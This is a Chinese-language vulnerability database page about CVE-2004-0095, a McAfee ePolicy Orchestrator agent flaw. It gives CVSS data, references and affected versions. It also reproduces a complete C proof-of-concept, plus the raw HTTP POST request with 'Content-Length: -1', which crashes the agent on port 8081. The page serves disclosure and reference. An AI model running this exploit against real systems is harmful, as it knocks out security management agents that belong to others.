CVE-2004-0095
CVSS5.0
发布时间 :2004-02-17 00:00:00
修订时间 :2008-09-05 16:37:31
NMCOES    

[原文]McAfee ePolicy Orchestrator agent allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value, possibly triggering a buffer overflow.


[CNNVD]McAfee ePolicy Orchestrator Agent HTTP POST缓冲区错误管理漏洞(CNNVD-200402-083)

        
        McAfee Security ePolicy Orchestrator是一款企业级反病毒管理工具。
        McAfee ePolicy Orchestrator agent存在缓冲区管理问题,远程攻击者可以利用这个漏洞对程序进行拒绝服务攻击。
        攻击者可以提交包含部分恶意值的HTTP POST请求,由于ePolicy Orchestrator没有进行充分过滤,可导致受此漏洞影响的代理端崩溃,虽然没有得到证实,不过此漏洞相信允许攻击者触发缓冲区溢出。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0095
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-083
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/9476
(VENDOR_ADVISORY)  BID  9476
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
(UNKNOWN)  CONFIRM  http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
http://xforce.iss.net/xforce/xfdb/14989
(UNKNOWN)  XF  epolicy-contentlength-post-dos(14989)
http://www.osvdb.org/3744
(UNKNOWN)  OSVDB  3744

- 漏洞信息

McAfee ePolicy Orchestrator Agent HTTP POST缓冲区错误管理漏洞
中危 边界条件错误
2004-02-17 00:00:00 2005-05-13 00:00:00
远程  
        
        McAfee Security ePolicy Orchestrator是一款企业级反病毒管理工具。
        McAfee ePolicy Orchestrator agent存在缓冲区管理问题,远程攻击者可以利用这个漏洞对程序进行拒绝服务攻击。
        攻击者可以提交包含部分恶意值的HTTP POST请求,由于ePolicy Orchestrator没有进行充分过滤,可导致受此漏洞影响的代理端崩溃,虽然没有得到证实,不过此漏洞相信允许攻击者触发缓冲区溢出。
        

- 公告与补丁

        厂商补丁:
        McAfee
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.mcafee.com/

- 漏洞信息 (23584)

McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent HTTP POST Buffer Mismanagement Vulnerability (EDBID:23584)
windows dos
2004-01-22 Verified
0 cyber_flash
N/A [点击下载]
source: http://www.securityfocus.com/bid/9476/info

The McAfee ePolicy Orchestrator agent has been reported to a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability.

The issue reportedly presents itself, because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized.

/*

 >McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement 
Vulnerability PoC

 >Ref            :  http://securityfocus.com/bid/9476
 >discovered by  :  cyber_flash@hotmail.com


"
The McAfee ePolicy Orchestrator agent has been reported to a buffer 
management vulnerability that may be exploited to crash the affected 
agent. Although unconfirmed, it has
 been reported that the issue may also allow a remote attacker to trigger 
a buffer overflow vulnerability.

The issue reportedly presents itself, because certain values in HTTP POST 
headers processed by the ePolicy Orchestrator are not sufficiently 
sanitized.

"


>Hi NA-eye ;-) . Hurry-yup . relase a patch guyz !


                                 + PoC by Shashank Pandey a.k.a 
G0D_0F_z10N +

> Greetz to my dewd 'Arun Jose' for 'Grass is not addictive..thing' while 
i wuz writing this..!

> lame coding ..dont think too much abt it...



*/


#include <windows.h>
#include <winsock.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")





int main(int argc, char *argv[])
{


  WSADATA wsaData;




      int s;

      struct hostent *yo;
      struct sockaddr_in wutever;

                char badb0y[] =

                "POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 
HTTP/1.0\r\n"
                "Accept: application/octet-stream\r\n"
                "Accept-Language: en-us\r\n"
                "Content-Type: application/octet-stream\r\n"
                "User-Agent: Godzilla/6.9 (compatible; SPIPE/3.0; 
Windows)\r\n"
                "Host: EPO_DIE\r\n"
                "Content-Length: -1\r\n"
                "Connection: Keep-Alive\r\n\r\n";

printf("\n--------------------------------- ");
 printf("\n McAfee ePO agent overflow PoC    \n");
 printf("+++++++++++++++++++++++++++++++++\n");
 printf(" by Shashank Pandey              \n");
 printf(" (reach_shash@linuxmail.org)     \n");
 printf("--------------------------------- \n");



if(WSAStartup(0x0101,&wsaData)!=0) {
      printf("Error :Cudn't initiate winsock!");
      return 0;
      }


if(argc<2)

{printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]);
  exit(0);}




  if ( (yo = gethostbyname(argv[1]))==0)
  {
    printf("error: can't resolve '%s'",argv[1]);
    return 1;
  }





  wutever.sin_port = htons(8081); // ePO agent uses the HTTP protocol to 
communicate on port 8081
  wutever.sin_family = AF_INET;
  wutever.sin_addr = *((struct in_addr *)yo->h_addr);

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    printf("error: can't create socket");
    return 1;
  }


  if ((connect(s, (struct sockaddr *) &wutever, sizeof(wutever))) == -1){
    printf("Error:Cudn't Connect\r\n");
    return 1;
  }



   printf("\r\nCrashing the client...< it's a PoC dewd ;-) >\n");

  send(s,badb0y,strlen(badb0y),0);



  closesocket(s);


  WSACleanup();





return 1;
}


		

- 漏洞信息

3744
McAfee ePolicy Orchestrator Invalid Content-Length DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Commercial

- 漏洞描述

McAfee ePolicy Orchestrator contains a flaw that may allow a remote denial of service. The issue is triggered when McAfee ePolicy Orchestrator recieves a HTTP POST request containing an invalid value in the "Content-Length:" header occurs, and will result in loss of availability for the the Orchestrator Agent.

- 时间线

2004-01-29 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, McAfee has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
Boundary Condition Error 9476
Yes No
2004-01-22 12:00:00 2009-07-12 02:06:00
Discovery of this vulnerability has been credited to <cyber_flash@hotmail.com>.

- 受影响的程序版本

McAfee ePolicy Orchestrator 3.0
McAfee ePolicy Orchestrator 2.5.1
McAfee ePolicy Orchestrator 2.5 SP1
McAfee ePolicy Orchestrator 2.5
McAfee ePolicy Orchestrator 2.0
McAfee ePolicy Orchestrator 1.1
McAfee ePolicy Orchestrator 1.0

- 漏洞讨论

The McAfee ePolicy Orchestrator agent has been reported to a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability.

The issue reportedly presents itself, because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized.

- 漏洞利用

The following proof-of-concept has been supplied:

POST /spipe/pkg?AgentGuid={}&amp;Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive

The following exploit has been provided by Shashank Pandey:

- 解决方案

The vendor has released fixes.


McAfee ePolicy Orchestrator 1.0

McAfee ePolicy Orchestrator 1.1

McAfee ePolicy Orchestrator 2.0

McAfee ePolicy Orchestrator 2.5 SP1

McAfee ePolicy Orchestrator 2.5

McAfee ePolicy Orchestrator 2.5.1

McAfee ePolicy Orchestrator 3.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站